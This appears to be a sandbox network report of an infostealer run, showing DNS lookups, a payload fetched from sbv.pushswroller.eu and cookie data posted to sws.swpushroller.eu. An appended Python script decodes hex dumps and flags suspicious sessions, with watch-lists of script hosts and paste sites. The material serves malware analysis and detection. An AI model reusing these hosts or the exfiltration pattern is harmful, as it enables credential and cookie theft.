Nov 26, 2024 09:33:21.734663963 CET | 53 | 53607 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:33:47.837759972 CET | 61775 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:33:47.979197025 CET | 53 | 61775 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:33:55.886491060 CET | 58080 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:33:56.213754892 CET | 53 | 58080 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 09:32:47.979490995 CET | 192.168.2.8 | 1.1.1.1 | 0x3bcb | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:32:54.681189060 CET | 192.168.2.8 | 1.1.1.1 | 0x45bc | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:15.807049990 CET | 192.168.2.8 | 1.1.1.1 | 0xa00a | Standard query (0) | sbv.pushswroller.eu | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:19.222898006 CET | 192.168.2.8 | 1.1.1.1 | 0x1e87 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:21.594911098 CET | 192.168.2.8 | 1.1.1.1 | 0xeb2f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:47.837759972 CET | 192.168.2.8 | 1.1.1.1 | 0x8b14 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:55.886491060 CET | 192.168.2.8 | 1.1.1.1 | 0xb926 | Standard query (0) | sws.swpushroller.eu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 09:32:48.126389980 CET | 1.1.1.1 | 192.168.2.8 | 0x3bcb | No error (0) | paste.ee | - | 104.21.84.67 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:32:48.126389980 CET | 1.1.1.1 | 192.168.2.8 | 0x3bcb | No error (0) | paste.ee | - | 172.67.187.200 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:32:54.999164104 CET | 1.1.1.1 | 192.168.2.8 | 0x45bc | No error (0) | 3105.filemail.com | ip.3105.filemail.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 09:32:54.999164104 CET | 1.1.1.1 | 192.168.2.8 | 0x45bc | No error (0) | ip.3105.filemail.com | - | 193.30.119.205 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:16.127003908 CET | 1.1.1.1 | 192.168.2.8 | 0xa00a | No error (0) | sbv.pushswroller.eu | - | 5.182.211.149 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:19.363226891 CET | 1.1.1.1 | 192.168.2.8 | 0x1e87 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 09:33:19.363226891 CET | 1.1.1.1 | 192.168.2.8 | 0x1e87 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:19.363226891 CET | 1.1.1.1 | 192.168.2.8 | 0x1e87 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:19.363226891 CET | 1.1.1.1 | 192.168.2.8 | 0x1e87 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:19.363226891 CET | 1.1.1.1 | 192.168.2.8 | 0x1e87 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:19.363226891 CET | 1.1.1.1 | 192.168.2.8 | 0x1e87 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:21.734663963 CET | 1.1.1.1 | 192.168.2.8 | 0xeb2f | No error (0) | reallyfreegeoip.org | - | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:21.734663963 CET | 1.1.1.1 | 192.168.2.8 | 0xeb2f | No error (0) | reallyfreegeoip.org | - | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:47.979197025 CET | 1.1.1.1 | 192.168.2.8 | 0x8b14 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:33:56.213754892 CET | 1.1.1.1 | 192.168.2.8 | 0xb926 | No error (0) | sws.swpushroller.eu | - | 45.80.158.30 | A (IP address) | IN (0x0001) | false
• paste.ee
• 3105.filemail.com
• reallyfreegeoip.org
• api.telegram.org
• sbv.pushswroller.eu
• checkip.dyndns.org
• sws.swpushroller.eu
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 104.21.84.67 | 80 | 7800 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:32:48.265235901 CET | 173 | OUT | GET /d/MQJcS HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-CH
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: paste.ee
Nov 26, 2024 09:32:49.490083933 CET | 977 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Nov 2024 08:32:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://paste.ee/d/MQJcS
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg3AkdCzGUZ5tjeDDFDe8Qa9N7bqK6B4XVqqzQ6yKHX6YYhr1tHGV1iXzWT6jPwjewraqy4Ze4NCQH%2BH53y9v9VkQnvr1WCMGNMPKOiaQV2T6r1fKV%2F5B%2By%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8887b37d94de94-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                      Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49711 | 5.182.211.149 | 80 | 8064 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:16.248311043 CET | 81 | OUT | GET /gfy/gesr.txt HTTP/1.1
Host: sbv.pushswroller.eu
Connection: Keep-Alive
Nov 26, 2024 09:33:17.533216953 CET | 251 | IN | HTTP/1.1 200 OK
etag: "43aac-67447ce9-1b92d5;;;"
last-modified: Mon, 25 Nov 2024 13:34:33 GMT
content-type: text/plain
content-length: 277164
accept-ranges: bytes
date: Tue, 26 Nov 2024 08:33:17 GMT
server: LiteSpeed
connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:17.533777952 CET1236INData Raw: 3d 67 31 52 4f 6c 45 52 45 46 45 55 48 35 55 53 45 52 55 51 51 68 46 57 48 35 55 53 45 52 55 51 51 64 6b 54 4a 52 45 52 42 42 46 57 59 64 6b 54 4a 52 45 52 42 42 31 52 4f 6c 45 52 45 46 45 55 59 68 31 52 4f 6c 45 52 45 46 45 55 48 35 55 53 45 52
                                                                                                                                                                      Data Ascii: =g1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRERBB1ROlEREFEUYh1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRERBB1ROlEREFEUYh1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRERBB1ROlEREFEUYh1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49712 | 193.122.6.168 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:19.490770102 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 26, 2024 09:33:20.764657021 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:20 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 79bfc0ce8a2155a7531c49db43d7f2b6
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:33:20.783932924 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Nov 26, 2024 09:33:21.189790010 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:20 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1644fda5bc6f0b69c3924e0f60f312be
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:33:23.551218033 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Nov 26, 2024 09:33:23.961576939 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:23 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: d5980f5f9a95a34e0fb57db3e77b8589
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49715 | 193.122.6.168 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:25.811736107 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Nov 26, 2024 09:33:27.177345991 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:26 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 2aee2580a03d1582435ad44d1f37e01b
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49717 | 193.122.6.168 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:28.986321926 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 26, 2024 09:33:30.308250904 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:30 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1e55ee0089debf307cd9acef17e6bb4a
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49719 | 193.122.6.168 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:32.100543976 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 26, 2024 09:33:33.366583109 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:33 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 484ff8fb0414b42d42344b01626e6312
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49721 | 193.122.6.168 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:35.265439034 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 26, 2024 09:33:36.536338091 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:36 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: e56c9621af90d0bab9834124ab42370d
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49723 | 193.122.6.168 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:38.327847958 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 26, 2024 09:33:39.595376015 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:39 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: f18b88167d29cde532932a5c573d8fbd
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49725 | 193.122.6.168 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:41.461373091 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 26, 2024 09:33:42.821469069 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:42 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 24ee06c392ccf31ed74b8772bd9002c8
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49727 | 193.122.6.168 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:44.661973953 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 26, 2024 09:33:46.021223068 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:45 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1fd56e20ed04ef68524c230f0017d1ed
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49731 | 45.80.158.30 | 80 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:33:56.344841957 CET | 144 | OUT | POST /swsk/P4.php HTTP/1.1
    Content-Type: text/plain; charset=utf-8
    Host: sws.swpushroller.eu
    Content-Length: 1432
    Connection: Keep-Alive
Nov 26, 2024 09:33:56.350992918 CET | 1432 | OUT | Data Raw: 4a 32 52 78 57 59 54 6c 4a 67 57 47 64 49 37 57 31 45 45 35 57 50 6b 56 32 68 62 68 4a 4a 59 33 54 77 4f 6e 46 79 66 35 7a 30 6e 4e 76 72 51 72 4b 56 44 6e 37 39 59 75 6c 39 59 6f 77 2b 45 58 66 65 6e 57 57 2b 41 65 6a 32 58 4a 31 73 44 66 59 59
    Data Ascii: J2RxWYTlJgWGdI7W1EE5WPkV2hbhJJY3TwOnFyf5z0nNvrQrKVDn79Yul9Yow+EXfenWW+Aej2XJ1sDfYYmUsMDpmST+Oow9OJKhMYlWQ1U16sVblH2yiCEq3Zoc7z3vYeANpzvLWP/9y30eOWRvoAJYDf5j9g9/6kEteejNwf4lRvcdya+CJYpHwrk3QMfh3NF1WRTGMA56Fy4HWcL8teKBV3Uh72AKXcInmLvpm2LI8vvfXmS
Nov 26, 2024 09:33:57.664963007 CET | 345 | IN | HTTP/1.1 201 Created
    Date: Tue, 26 Nov 2024 08:33:57 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
    X-Powered-By: PHP/8.0.30
    Content-Length: 86
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 44 61 74 61 20 75 70 6c 6f 61 64 65 64 20 61 6e 64 20 64 65 63 72 79 70 74 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 37 39 34 31 2e 74 78 74 22 7d
    Data Ascii: {"message":"Data uploaded and decrypted successfully.","file_name":"Cookies_7941.txt"}

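An added example, written for this page and not part of the Joe Sandbox report: it rebuilds the HTTP bodies the report prints as "Data Raw:" hex dumps (including the chunked framing of the paste.ee reply in the wscript.exe session that follows) and runs a few detection checks over the session metadata shown above. Every sample value is copied from this page's sessions; the helper names, and the watch-list entries other than checkip.dyndns.org and paste.ee, are my own assumptions.

```python
"""Added example (mine, not part of the Joe Sandbox report): rebuild the HTTP
bodies the report prints as 'Data Raw:' hex dumps and run detection checks over
the session metadata shown above. Sample values are copied from this page; the
helper names and the extra entries in the watch-lists are my own assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# --- 1. 'Data Raw:' hex dump -> bytes, with HTTP chunked framing removed ---
def parse_data_raw(line: str) -> bytes:
    """Convert a report line such as 'Data Raw: 3c 68 74 ...' into raw bytes."""
    hexpart = line.split("Data Raw:", 1)[1]
    return bytes.fromhex(hexpart.replace(" ", "").strip())

def decode_chunked(body: bytes) -> bytes:
    """Strip HTTP/1.1 chunked framing (<size-hex> CRLF <data> CRLF ... 0 CRLF).
    A sandbox capture is usually cut off mid-chunk, so a short last chunk is kept."""
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            break
        size_field = body[pos:eol].split(b";")[0].strip()  # drop chunk extensions
        if not size_field or int(size_field, 16) == 0:  # trailer / last-chunk marker
            break
        size = int(size_field, 16)
        chunk = body[eol + 2 : eol + 2 + size]
        out += chunk
        if len(chunk) < size:  # truncated capture: keep what we have
            break
        pos = eol + 2 + size + 2  # skip the CRLF that terminates the chunk
    return bytes(out)

def extract_public_ip(html: bytes) -> Optional[str]:
    """Pull the address out of a checkip.dyndns.org reply body."""
    m = re.search(rb"Current IP Address: (\d{1,3}(?:\.\d{1,3}){3})", html)
    return m.group(1).decode() if m else None

# Constructed from the report: the checkip reply body (103 bytes, matching its
# Content-Length header) and the first bytes of the chunked paste.ee reply.
CHECKIP_RAW = ("Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 "
               "72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 "
               "61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 "
               "73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 "
               "74 6d 6c 3e 0d 0a")
PASTE_RAW = "Data Raw: 31 66 37 66 0d 0a 0d 0a 0d 0a 4e 50 61 6b 65 6c 76 57 71 47 78 4b 67 4e 55 20 3d 20 22"

# --- 2. Session-level checks over the report's session tables ---
@dataclass
class Session:
    sid: int
    process: str
    dst_port: int
    method: str
    host: str
    user_agent: str = ""
    content_type: str = ""

SESSIONS = [  # copied from the session tables on this page
    Session(7, r"C:\Windows\SysWOW64\OneDriveSetup.exe", 80, "GET", "checkip.dyndns.org",
            "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"),
    Session(10, r"C:\Windows\SysWOW64\OneDriveSetup.exe", 80, "POST", "sws.swpushroller.eu",
            "", "text/plain; charset=utf-8"),
    Session(0, r"C:\Windows\System32\wscript.exe", 443, "GET", "paste.ee",
            "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"),
]

# Assumed watch-lists; only checkip.dyndns.org and paste.ee appear on this page.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
PASTE_SITES = {"paste.ee", "pastebin.com"}
IP_CHECK_SITES = {"checkip.dyndns.org", "api.ipify.org"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}

def flag_session(s: Session) -> List[str]:
    """Return human-readable findings for one session (empty list = nothing odd)."""
    exe = s.process.rsplit("\\", 1)[-1].lower()
    findings = []
    if exe in SCRIPT_HOSTS and s.host in PASTE_SITES:
        findings.append("script host pulling a second stage from a paste site")
    if s.host in IP_CHECK_SITES and exe not in BROWSERS:
        findings.append("non-browser external IP lookup (victim tagging by stealers)")
    if "MSIE 6.0" in s.user_agent and exe not in BROWSERS:
        findings.append("hard-coded legacy MSIE 6.0 User-Agent from a non-browser")
    if s.method == "POST" and s.dst_port == 80 and not s.user_agent and s.content_type.startswith("text/plain"):
        findings.append("cleartext text/plain POST with no User-Agent (likely exfiltration)")
    return findings

def report(sessions=SESSIONS) -> Dict[int, List[str]]:
    """Map session ID -> findings for every session."""
    return {s.sid: flag_session(s) for s in sessions}

if __name__ == "__main__":
    body = parse_data_raw(CHECKIP_RAW)
    print(len(body), extract_public_ip(body), decode_chunked(parse_data_raw(PASTE_RAW)))
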